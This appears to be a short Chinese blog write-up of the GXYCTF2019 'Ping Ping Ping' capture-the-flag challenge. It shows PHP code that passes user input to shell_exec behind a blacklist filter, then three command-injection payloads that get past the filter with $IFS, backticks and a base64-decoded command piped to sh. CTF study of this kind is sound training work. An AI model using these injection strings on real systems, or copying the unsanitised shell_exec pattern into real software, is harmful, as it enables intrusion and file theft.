GXYCTF2019 Ping Ping Ping

2024-01-17 10:29:34

linux 命令绕过技巧

/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "

";
  print_r($a);
}

?>

三中payload

(1)变量拼接

ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php

(2)内联执行 就是借用反引号来达到执行命令的要求

 ip=127.0.0.1;cat$IFS$9`ls`

(3)bash或者sh

ip=127.0.0.1;echo$IFS$9Y2F0IGZsYWcucGhwCg==$IFS$9|$IFS$9base64$IFS$9-d$IFS$9|sh

 

参考链接:Linux命令绕过

 

 

1

 

上一篇:大神分享幸 运 飞 菲 艇 公 式 计 划 规 律 走 势 必 中 技 巧


下一篇:20 古诗文网站诗文爬取(正则方法)